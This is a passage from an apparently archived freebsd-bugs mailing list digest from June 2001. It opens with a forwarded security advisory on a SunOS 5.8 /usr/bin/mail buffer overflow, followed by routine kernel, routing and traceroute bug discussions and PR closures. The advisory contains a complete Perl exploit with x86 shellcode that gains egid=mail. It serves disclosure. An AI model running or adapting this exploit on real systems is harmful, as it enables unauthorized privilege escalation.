permission. Disclaimer: The information in this advisory is believed to be true based on experiments though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: There is a buffer overflow in SunOS 5.8 x86 with $HOME and /usr/bin/mail leading to egid=mail. Details: HOME=`perl -e 'print "A"x1100'` ; export HOME mail a CTL-C eip gets smashed with 0x41414141. Exploit: -------------solmail.pl---------------------- #!/usr/bin/perl # /usr/bin/mail exploit by Georgi Guninski use Env qw($HOME); #shell code taken from Pablo Sor's mailx exploit $shell = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"; $shell .="\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"; $shell .="\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"; $shell .="\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"; $shell .="\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"; $shell .="\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"; $shell .="\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"; $shell .="\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"; $shell .="\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"; $shell .="\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78"; $RET = "\xa0\x6f\x04\x08" ; #may need to change this $OVER=1032; $ALL=1200; $buf=$RET x ($OVER/4) . "\x90" x ($ALL - $OVER - length($shell)) . $shell; system("/bin/ln -s /bin/ksh /tmp/xx"); print "Written by Georgi Guninski, shell code taken from Pablo Sor's mailx exploit.\nPress CTL-C\n"; $ENV{HOME}=$buf; exec "/usr/bin/mail","A"; --------------------------------------------- Workaround: chmod -s /usr/bin/mail Vendor status: Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches. >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:10:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9CAA837B407 for ; Wed, 6 Jun 2001 07:10:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56EAAH28032; Wed, 6 Jun 2001 07:10:10 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 07:10:10 -0700 (PDT) Message-Id: <200106061410.f56EAAH28032@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yar Tikhiy Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Reply-To: Yar Tikhiy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27432; it has been noted by GNATS. From: Yar Tikhiy To: Shawn Murphy Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Date: Wed, 6 Jun 2001 18:05:46 +0400 No, it won't. The code is executed only at the boot time, when the kernel is configuring PnP devices. As for the parameter value, the kernel warning should have shown you the right number, but it did not due to a bug. I'll fix the corresponding printf() so it shows the neccessary information. For now, if 16 works for you, keep that value. On Mon, Jun 04, 2001 at 10:39:20PM -0500, Shawn Murphy wrote: > > Thank you for the advice, it did fix the problem. What would you > recommend for a value? I doubled it (to 16). Will that cause any > problems. Will it cause inefficiency? > > Thanks for your time, > -Shawn > > On 3 Jun 2001, at 12:07, Yar Tikhiy wrote: > > > Please try increasing MAXDEP (file /usr/src/sys/isa/pnpparse.c at > > about line 39). Unfortunately, the kernel message is rather misleading > > because the number "8" in it is the MAXDEP value, not the actual > > number of dependencies in your PnP configuration. -- Yar -- Yar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:30:27 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E584737B403; Wed, 6 Jun 2001 07:30:22 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56EUMo29943; Wed, 6 Jun 2001 07:30:22 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 07:30:22 -0700 (PDT) From: Message-Id: <200106061430.f56EUMo29943@freefall.freebsd.org> To: andre.albsmeier@mchp.siemens.de, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD not always seems to take the best route State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 07:27:57 PDT 2001 State-Changed-Why: The analysis shows this PR is the duplicate of PR kern/10778. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27890 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:33:39 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9893D37B407; Wed, 6 Jun 2001 07:33:37 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56EXbM30277; Wed, 6 Jun 2001 07:33:37 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 07:33:37 -0700 (PDT) From: Message-Id: <200106061433.f56EXbM30277@freefall.freebsd.org> To: archie@whistle.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: kern/10778: "ipforward_rt" is not cleared when routing table changes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: "ipforward_rt" is not cleared when routing table changes State-Changed-From-To: open->analyzed State-Changed-By: ru State-Changed-When: Wed Jun 6 07:30:49 PDT 2001 State-Changed-Why: The ipforward_rt part has been fixed in in_rmx.c,v 1.39. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Wed Jun 6 07:30:49 PDT 2001 Responsible-Changed-Why: I will work on the remnants of this problem. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=10778 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:40: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 00F1137B403 for ; Wed, 6 Jun 2001 07:40:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Ee4D30875; Wed, 6 Jun 2001 07:40:04 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 07:40:04 -0700 (PDT) Message-Id: <200106061440.f56Ee4D30875@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Andre Albsmeier To: Ruslan Ermilov Cc: Andre Albsmeier , bug-followup@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 16:29:33 +0200 On Wed, 06-Jun-2001 at 15:32:05 +0300, Ruslan Ermilov wrote: > On Wed, Jun 06, 2001 at 12:29:04PM +0200, Andre Albsmeier wrote: > > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > > : 192.168.1 link#1 UC 4 0 rl0 => > > > : 192.168.2 192.168.1.2 UGSc 1 3 rl0 > > > > > > The refcount on 192.168.2 route has grown to 1, indicating that the > > > UDP socket now holds on this route. The `Use' count of 3 corresponds > > > to our three UDP datagrams (ping4, ping5, and ping6). > > > > > > Could you please repeat these steps in your environment, and try to > > > detect where it behaved differently in your case. > > > > It doesn't behave differently, that's interesting. May I ask you to > > try it using syslogd? > > > > - Let host C log to host S (with the route installed). > > - Watch C's messages appear on S. > > - Delete C's route to S (via router 2) > > - Let host C log again (run tcpdump on router 1 to see the packets come in) > > - Install the route to S (via router 2) again on C > > - Log more stuff. If you don't see the packets go into router 1 anymore > > I am really lost... > > > Yes, I have reproduced the problem here. My test misses one step. Hmm, I just wonder why syslogd behaves differently... > OK, now about what happens here. > > Initially, there is the route (cloned from the network route) to S > (192.168.2.1) through the router 2 (192.168.1.2). UDP socket uses > this route initially. When this (and the 192.168.2 network) routes > disappear, on the next write (!), ip_output() detects that the S > route is DOWN, and "allocates" (caches) another route, which happens > to be the "default" route pointing to router 1 (192.168.1.1). > Later, when the route to the 192.168.2 network gets installed again, > it's not taken into account, as the cached ("default") route is still > UP. So this would match my (rather amateurish) description when saying: It seems that as long as packets can be send somewhere, the kernel doesn't bother if there is a better route to the destination until the socket is closed and opened again. > Unfortunately, there is no easy way to fix this. Checking for > the best-match route on every write may be too time consuming. > As the workaround, you can delete and re-add your "default" > route. This worked for me here. `route delete default' will Just tried it, worked here as well. > delete the "default" route from the routing table, but because > it has a refcnt>0 will not delete it immediately, but will mark > it as DOWN. ip_output() for this UDP socket's write will detect > that the cached route is DOWN, will free it, and allocate a new > route, which will be the route to the 192.168.2 network through > router 2 (192.168.1.2) this time. > > The actual fix would be to notify protocol (from within the > routing code) whenever its routing table is modified. This > notification could then be saved in a variable as timestamp, > and every PCB-cached route could have a similar timestamp as > well, indicating when this "caching" took place. Having > that, ip_output() would "invalidate" cached route if it was > cached before the last routing table modification was done. > > I could probably try to implement this, if no one else can > come up with a better idea. I can only offer to test any new code since my knowledge about the corresponding parts in the kernel is not sufficient to implement it. Thanks so far, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:43: 9 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 3F35637B403 for ; Wed, 6 Jun 2001 07:43:07 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA98629; Wed, 6 Jun 2001 10:42:59 -0400 (EDT) (envelope-from wollman) Date: Wed, 6 Jun 2001 10:42:59 -0400 (EDT) From: Garrett Wollman Message-Id: <200106061442.KAA98629@khavrinen.lcs.mit.edu> To: Andre Albsmeier Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/27890: FreeBSD not always seems to take the best route In-Reply-To: <200106061440.f56Ee4D30875@freefall.freebsd.org> References: <200106061440.f56Ee4D30875@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: [quoting ru:] >> Unfortunately, there is no easy way to fix this. Checking for >> the best-match route on every write may be too time consuming. >> As the workaround, you can delete and re-add your "default" >> route. This worked for me here. `route delete default' will > Just tried it, worked here as well. I think this is perfectly acceptable as the ``official'' fix. It's not clear to me that the current behavior is entirely incorrect, either. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:50:47 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4257B37B408; Wed, 6 Jun 2001 07:50:44 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Eoiw32182; Wed, 6 Jun 2001 07:50:44 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 07:50:44 -0700 (PDT) From: Message-Id: <200106061450.f56Eoiw32182@freefall.freebsd.org> To: sec@42.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/19598: traceroutes default of 30 Hops is too low Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: traceroutes default of 30 Hops is too low State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 07:45:51 PDT 2001 State-Changed-Why: Either use the -m option, or bug the maintainers at if you still believe that the default should be raised. The latest 1.4a12 still has the default of 30 hops. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=19598 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:55:34 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from matrix.42.org (matrix.42.org [194.246.250.200]) by hub.freebsd.org (Postfix) with ESMTP id C20FF37B401; Wed, 6 Jun 2001 07:55:29 -0700 (PDT) (envelope-from sec@42.org) Received: (from sec@localhost) by matrix.42.org (8.8.8/8.8.5) id QAA08450 (sender ); Wed, 6 Jun 2001 16:55:28 +0200 (CEST) Date: Wed, 6 Jun 2001 16:55:27 +0200 From: Stefan `Sec` Zehl To: ru@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/19598: traceroutes default of 30 Hops is too low Message-ID: <20010606165527.C276@matrix.42.org> X-Current-Backlog: 653 messages References: <200106061450.f56Eoiw32182@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200106061450.f56Eoiw32182@freefall.freebsd.org>; from ru@FreeBSD.org on Wed, Jun 06, 2001 at 07:50:44AM -0700 I-love-doing-this: really X-Modeline: vim:set ts=8 sw=4 smarttab tw=72 si noic notitle: Accept-Languages: de, en X-URL: http://sec.42.org/ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 07:50:44AM -0700, ru@FreeBSD.org wrote: > Synopsis: traceroutes default of 30 Hops is too low > > State-Changed-From-To: open->closed > State-Changed-By: ru > State-Changed-When: Wed Jun 6 07:45:51 PDT 2001 > State-Changed-Why: > Either use the -m option, or bug the maintainers at > if you still believe that > the default should be raised. I have, i have never receieved any response from them whatsoever. Thats why I sent it in to the FreeBSD project. CU, Sec -- I know that you believe that you understand what you think I said. But I am not sure you realize, that what you heared is not what i meant. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 7:58:56 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id AF7B137B403; Wed, 6 Jun 2001 07:58:50 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA98740; Wed, 6 Jun 2001 10:58:49 -0400 (EDT) (envelope-from wollman) Date: Wed, 6 Jun 2001 10:58:49 -0400 (EDT) From: Garrett Wollman Message-Id: <200106061458.KAA98740@khavrinen.lcs.mit.edu> To: Cc: sec@42.org, freebsd-bugs@FreeBSD.ORG Subject: Re: bin/19598: traceroutes default of 30 Hops is too low In-Reply-To: <200106061450.f56Eoiw32182@freefall.freebsd.org> References: <200106061450.f56Eoiw32182@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > The latest 1.4a12 still has the default of 30 hops. The right answer is almost certainly for traceroute to use syctl(3) to find out what the kernel's default TTL is, and then use that. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 8: 0: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C69037B403 for ; Wed, 6 Jun 2001 08:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56F02P32978; Wed, 6 Jun 2001 08:00:03 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 08:00:03 -0700 (PDT) Message-Id: <200106061500.f56F02P32978@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Ruslan Ermilov To: Andre Albsmeier Cc: bug-followup@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 17:56:15 +0300 On Wed, Jun 06, 2001 at 04:29:33PM +0200, Andre Albsmeier wrote: > On Wed, 06-Jun-2001 at 15:32:05 +0300, Ruslan Ermilov wrote: > > On Wed, Jun 06, 2001 at 12:29:04PM +0200, Andre Albsmeier wrote: > > > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > > > : 192.168.1 link#1 UC 4 0 rl0 => > > > > : 192.168.2 192.168.1.2 UGSc 1 3 rl0 > > > > > > > > The refcount on 192.168.2 route has grown to 1, indicating that the > > > > UDP socket now holds on this route. The `Use' count of 3 corresponds > > > > to our three UDP datagrams (ping4, ping5, and ping6). > > > > > > > > Could you please repeat these steps in your environment, and try to > > > > detect where it behaved differently in your case. > > > > > > It doesn't behave differently, that's interesting. May I ask you to > > > try it using syslogd? > > > > > > - Let host C log to host S (with the route installed). > > > - Watch C's messages appear on S. > > > - Delete C's route to S (via router 2) > > > - Let host C log again (run tcpdump on router 1 to see the packets come in) > > > - Install the route to S (via router 2) again on C > > > - Log more stuff. If you don't see the packets go into router 1 anymore > > > I am really lost... > > > > > Yes, I have reproduced the problem here. My test misses one step. > > Hmm, I just wonder why syslogd behaves differently... > Because my test missed one step: the route to S through router 2 should exist initially to reproduce this with netcat(1). You then send some data, delete the route, again send data so that the "default" route gets cached, and install the route to S again. -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 8: 3:50 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D9C2237B403; Wed, 6 Jun 2001 08:03:44 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56F3i933474; Wed, 6 Jun 2001 08:03:44 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 08:03:44 -0700 (PDT) From: Message-Id: <200106061503.f56F3i933474@freefall.freebsd.org> To: sec@42.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/19598: traceroutes default of 30 Hops is too low Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: traceroutes default of 30 Hops is too low State-Changed-From-To: closed->analyzed State-Changed-By: ru State-Changed-When: Wed Jun 6 08:02:25 PDT 2001 State-Changed-Why: After looking at OpenBSD changes, I feel that we should change the default to the value of net.inet.ip.ttl MIB. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Wed Jun 6 08:02:25 PDT 2001 Responsible-Changed-Why: I will fix that. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=19598 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 8: 7:40 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 889CF37B408 for ; Wed, 6 Jun 2001 08:07:33 -0700 (PDT) (envelope-from ru@whale.sunbay.crimea.ua) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.2/8.11.2) id f56F6uD12381; Wed, 6 Jun 2001 18:06:56 +0300 (EEST) (envelope-from ru) Date: Wed, 6 Jun 2001 18:06:55 +0300 From: Ruslan Ermilov To: Garrett Wollman Cc: sec@42.org, freebsd-bugs@FreeBSD.ORG Subject: Re: bin/19598: traceroutes default of 30 Hops is too low Message-ID: <20010606180655.C87653@sunbay.com> Mail-Followup-To: Garrett Wollman , sec@42.org, freebsd-bugs@FreeBSD.ORG References: <200106061450.f56Eoiw32182@freefall.freebsd.org> <200106061458.KAA98740@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106061458.KAA98740@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Wed, Jun 06, 2001 at 10:58:49AM -0400 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 10:58:49AM -0400, Garrett Wollman wrote: > < said: > > > The latest 1.4a12 still has the default of 30 hops. > > The right answer is almost certainly for traceroute to use syctl(3) to > find out what the kernel's default TTL is, and then use that. > Cool! :-) Just wrote the same in the audit trail. -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 9:27:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B556137B403; Wed, 6 Jun 2001 09:27:08 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56GR8W47377; Wed, 6 Jun 2001 09:27:08 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 09:27:08 -0700 (PDT) From: Message-Id: <200106061627.f56GR8W47377@freefall.freebsd.org> To: lord@crocodile.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/5618: kernel memory leak in routetbl. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kernel memory leak in routetbl. State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 09:20:53 PDT 2001 State-Changed-Why: Overtaken by events. Please resubmit if the problem is still reproduceable in 4.3 or later. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=5618 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 9:53: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BCC8B37B405; Wed, 6 Jun 2001 09:53:00 -0700 (PDT) (envelope-from obrien@FreeBSD.org) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Gr0k50322; Wed, 6 Jun 2001 09:53:00 -0700 (PDT) (envelope-from obrien) Date: Wed, 6 Jun 2001 09:53:00 -0700 (PDT) From: Message-Id: <200106061653.f56Gr0k50322@freefall.freebsd.org> To: gwk@sgi.com, obrien@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: bin/24438: sys.mk is lacking single suffix rules for C++ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sys.mk is lacking single suffix rules for C++ State-Changed-From-To: open->closed State-Changed-By: obrien State-Changed-When: Wed Jun 6 09:52:37 PDT 2001 State-Changed-Why: committed. Thanks! Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: obrien Responsible-Changed-When: Wed Jun 6 09:52:37 PDT 2001 Responsible-Changed-Why: I did it. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24438 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 10:30:30 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30DCF37B401; Wed, 6 Jun 2001 10:30:29 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56HUTp56107; Wed, 6 Jun 2001 10:30:29 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 10:30:29 -0700 (PDT) From: Message-Id: <200106061730.f56HUTp56107@freefall.freebsd.org> To: Danny_Johnston@simn.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/25592: Route table appears to fill up, and connections can not be extablished Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Route table appears to fill up, and connections can not be extablished State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 10:08:16 PDT 2001 State-Changed-Why: 256 entries in the routing table is not high. Make sure you have `maxusers' set to a high value, or tune network buffers with the NMBCLUSTERS option. See with `vmstat -m' who "eats" memory. If the problem is with too many cloned routes, try setting the net.inet.ip.rtexpire=0. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=25592 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 10:39:44 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B0D837B403; Wed, 6 Jun 2001 10:39:42 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Received: (from jhb@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Hdeg57213; Wed, 6 Jun 2001 10:39:40 -0700 (PDT) (envelope-from jhb) Date: Wed, 6 Jun 2001 10:39:40 -0700 (PDT) From: Message-Id: <200106061739.f56Hdeg57213@freefall.freebsd.org> To: dima@rt.ru, jhb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/17505: Problems with with SMP on Compaq proliant Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Problems with with SMP on Compaq proliant State-Changed-From-To: open->closed State-Changed-By: jhb State-Changed-When: Wed Jun 6 10:38:46 PDT 2001 State-Changed-Why: The originator did not respond to a request to see if this problem had been fixed by earlier changes in 4.2-stable. Also, this is a duplicate of PR 24210. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17505 To Unsubscribe: send mail to 